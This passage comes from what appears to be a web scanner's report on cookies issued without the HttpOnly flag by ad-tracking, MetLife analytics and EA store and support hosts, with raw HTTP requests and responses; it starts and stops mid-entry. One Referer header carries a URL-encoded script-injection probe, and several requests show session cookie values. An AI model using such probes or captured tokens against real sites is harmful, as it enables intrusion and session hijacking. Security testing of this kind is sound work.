Cookie: uid=f034cbc4-3674-4d22-be3a-aac76e8e10cb; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1308836704+ \"TgNDVQABeU4K7F4GcysJsg==\"+ 63083+ 25140+ 4515]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuG4v5hNgFHiQVvvBxYFRo0XU4C0AaMFmM8lwbFiPitQ9ltTK1j22+spQFkGCwYuEY41/5kEmCSegWUYNBigor0LQKa1nH36Hln09USQ6MGH11FEJ78HmX2hYTOK6Fuw2rNoor8XgtTORRO9+5IFKDrjQwOK6E6gm7MkPr1HFhXlmPmDRaCVWWLRaVThXV9ZBCYySpxb/v8dsvAsoBnXGCWuvPz3Dtnosy9YBZgl9j29hyL68RXYcbsuoIjO2ggSvfX9IEIUABhbZm8="; io_freq_p1="eJzjkuY4mCDAKPGgrfcDiwKjxoOVkz6wGDBagPlcIhzbQgUOMkl8a2oFyjJoMBgwWDBwCXP8sBFgkniGJrgMZE7L2afvkQWXxANVHnx4HUXwcQxQ5YWGzSiCF0KBgnPRBJ8GAAVnfGhAEhTh+BEo0Mosseg0quitQIGJjBLnlv9/h2zA5hgBZol9T++hCB4F2T931wUUwe5woOCt7wcRggDyxkuo"; segments_p1="eJwdkctKAlEcxtGZxeGs5oF6hPb1Cm16hiwkEqeF0SJJw6xNlHlbGJKbxEuD5MLISwmBGkaCQ9AEY9r/+zYfP77zvx9tKrdsaFMlOgHR4wJ4uAC3foOiH3dwJn1wbAydjYLaUDfbgg5D6jSWG4J2HUaR0TVWOV+AT2fg/D04QafmQS9DqP7lg3sSb6imEqkj+uoJb13GPXKuxgjctNEutKm1quYMK5OKe6YYWQwUmyCiZUPjR6jSZI4zBbtzaMWHJl0yFyiuoLvs8cp+J/R/8nA+ffRbrQtGx8DUmuAD87Pc1GG/NjN7beR0bvHqsHfqBTrljgPGVCOIuZA5tNofBaxu6XBuiuP9ISvN++wtwaUM9H0A5znPuXmVhsxqqJxCIIePFvC4I7ZWg7BpvS3CLkoWuWzO5QgV6LjAw9OPlaHfHNPm6WweYXYGvvbxIWlLsO9h8cgW/hlNhwfGP7gfnzo="

Response

HTTP/1.0 302 Found
Server: IM BidManager
Date: Fri, 24 Jun 2011 13:18:31 GMT
Expires: Fri, 24-Jun-2011 13:18:11 GMT
Location: http://ad.yieldmanager.com/pixel?id=754430&t=2
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/plain
Set-Cookie: segments_p1="eJwdkU9LAlEUxWlmFq9ZzQfqI7Svdbs2foZMXCTOpmiRZDFZBFHmP6iQ3CSaiejCKLWEQCeMBhqCDJzG7jmbH2fOPe/eN/eZuoqumobqBQvCvV9NmA40U1fOksijAEaGRl6JLM1hVJir8Ux9BH1PNsgmqy2y19GFQyY9Vv0v6O8RWoZKMF8WJNbFTI4R2Cb3PcQOfPAkiibpLnTeR7VwC95J1VTVvG5lndTUEOenoEuzOoINm3chWzamZSxJD+KG9RrEfaSHW+j7fgNO/3AoFoK2y3u4OJSLCC4i8p3rwy2R11nkqgmctIvgYwGOy+qkopmLylmzTq9yHNScoLjB4CYZ4x6TRY6rc1wZepfV1A5/vg3tPKF6POMiyDP659Qloa4aeJoKjSaXXJvyUdjsgezQ6V4i80zdJwfkC/k2AMdF/sMM/CA/Se+Qz1fGhsOVf+IOnsE="; Domain=invitemedia.com; expires=Sat, 23-Jun-2012 13:18:31 GMT; Path=/

13.60. http://segments.adap.tv/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=aoltacoda&type=gif&add=true&segment=99999,51134,56282,57094,60740,56297,57130,57129,53380,60489,60515,52615,57289,52946,53656,55401,50507,50557,54255,53778,51182,54252,50961,54209,56835,55467,56673,57372,56780,56232,57288 HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcodeqt.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"31\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1508],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}"; adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-20+05%3A11%3A12"; rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jun+27+05%3A11%3A12+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-24+07%3A15%3A31";Path=/;Domain=.adap.tv;Expires=Mon, 02-Mar-2043 16:02:11 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1508],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Mon, 02-Mar-2043 16:02:11 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
13.61. http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsjn8qwj10000wge3o74vumw_2o3f/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsjn8qwj10000wge3o74vumw_2o3f/dcs.gif?&dcsdat=1308935068482&dcssip=www.metlife.com&dcsuri=individual/index.html&WT.co_f=173.193.214.243-1234505376.30151644&WT.vt_sid=173.193.214.243-1234505376.30151644.1308935068484&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=12&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Life%20Insurance,%20Dental%20Insurance%20%26%20Financial%20Services%20|%20MetLife&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1057x822&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.5.0&WT.dl=0&WT.ssl=0&WT.es=www.metlife.com/&WT.ad=PRO_Pro1_LIfeCalculatorJungle_5-21563_T3619-IN-individual;PRO_Pro2_TermDisIF_5-8675_T3619-IN-individual;PRO_Pro3a_AutoInsSave_5-48085_T3619-IN-individual;PRO_Pro3b_DisabilityCalc_5-48078_T3619-IN-individual;PRO_Pro5_SignIn_5-16382_T3619-IN-individual;PRO_PRO_FacebookRR_5-33248_T3619-IN-individual;&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.dcsvid=173.193.214.243-1234505376.30151644 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAAMAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NCgAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 17:04:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAANAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAJvDBE6bwwROCwAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAACbwwROm8METgAAAAA-; path=/; expires=Mon, 21-Jun-2021 17:04:27 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
13.62. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js HTTP/1.1
Host: store.origin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 23 Jun 2016 20:09:22 GMT
ETag: "124a-4cdd6bd8"
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 16:31:20 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=7200+0;age=0;ecid=103388170674,0)
Content-Length: 4682
Date: Fri, 24 Jun 2011 14:09:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app45
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=755696138.260.0000; path=/

FSR.surveydefs = [{
name: 'browse',
invite: {
when: 'onentry'
},
pop: {
when: 'later'
},
criteria: {
sp: 3.5,
lf: 3
},
inclu
...[SNIP]...
13.63. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: store.origin.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 15:31:17 GMT
ETag: "184-4dbae12a"
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 16:02:50 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=478;ecid=94799985348,0)
Content-Length: 388
Date: Fri, 03 Jun 2011 09:31:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app50
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3875668490.772.0000; path=/

......JFIF.....d.d......Ducky.......M......Adobe.d................................................            .................................
.............................................................
...[SNIP]...
13.64. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253AHOME%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/buy/ThemeID.718200/productID.208594200%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; expires=Sat, 23-Jun-2012 20:25:25 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=142044525971,0)
Date: Fri, 24 Jun 2011 14:36:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 26163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926173482:NODE=c2a5301:THREA
...[SNIP]...
13.65. http://support.ea.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:43:53 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUr3RqfLvbvfAQyyQF3BO3O5eBD5UDJU1OgNiBNa5aln8nU_kAYTMtwvQHCZCR4Sy%7Er7xzSor_OsEiAISMYqNLuEJPIad5tYvfh4WlDPleFxpVtU8bR3V_iiRQhVr6vCVvtkzSNKDY43q39hphDEKoHzUXEuLdiuNM; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:43:52 GMT
RNT-Time: D=201738 t=1308923033235509
RNT-Machine: 03
Vary: Accept-Encoding
Content-Length: 69313
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
13.66. http://support.ea.com/app/answers/detail/a_id/3628  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/3628

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/3628 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/3628%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:39 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUCbbI8WvwJ8XZQOjEQt2i1Q0fZTkzRFiLoDdxc%7ELs1l45IOx9zxevzKFQ3KbAh7fzW1kRE9ZcNvO4b3YVytMrMjbrXW3TfaDRK3iy8mmbgVNRxcVLd7EX4vEG7T6_KbC8ZM%7EwMJKli4WGY9eh8ZRsBU6bL3TBIR3MkUc0tFjeINb3R_Q0me2SG_Cype8ALWK6czvjBc36mLWdai%7EZD1XkUtKuJBcucfjdmq04K%7E1UuOq0G6FgMknu3fqsOLsFmVzFwlVbKEMGbUVkmLJ%7E4CMHygy6lAz515nVF8tdVR4HBWl960hfl%7EUhlg%21%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:47:38 GMT
RNT-Time: D=394317 t=1308923259033751
RNT-Machine: 09
Vary: Accept-Encoding
Content-Length: 73871
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
13.67. http://support.ea.com/app/answers/detail/a_id/4394  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/4394

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/4394 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/4394%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:40 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUkJSO38Es9J0RGEO_uFF1CEydSbW6hNEdPjQ4KakiLgN13WCCMTPHWvy9OzayzC4vDSetK1OMjiqOvArY%7ESztlgDl5VxB4iUKmLnJLtRzwdcf_QIN7n1LWTls9jIVHomeIe_X_KQUv6xZsiVzNov65aJBz5VvIR6donYevaUJyoZgJTL%7EsO0l8sZQJFf1p3ZxC%7EdnCn7uaJf7b0JdQ5H1FV1od3lG15RYwF4UEN29P8hCRJ0TLiQtX89WTotdNfpIfre4AdGcVpCxxHuXIj_FcRBRYzeZgRJUrh6QRGdYxKol%7Et%7Ed9PCbIw%21%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:47:41 GMT
RNT-Time: D=1458046 t=1308923260730839
RNT-Machine: 17
Vary: Accept-Encoding
Content-Length: 83422
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
13.68. http://thesearchagency.net/pixspike.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thesearchagency.net
Path:   /pixspike.php

Issue detail

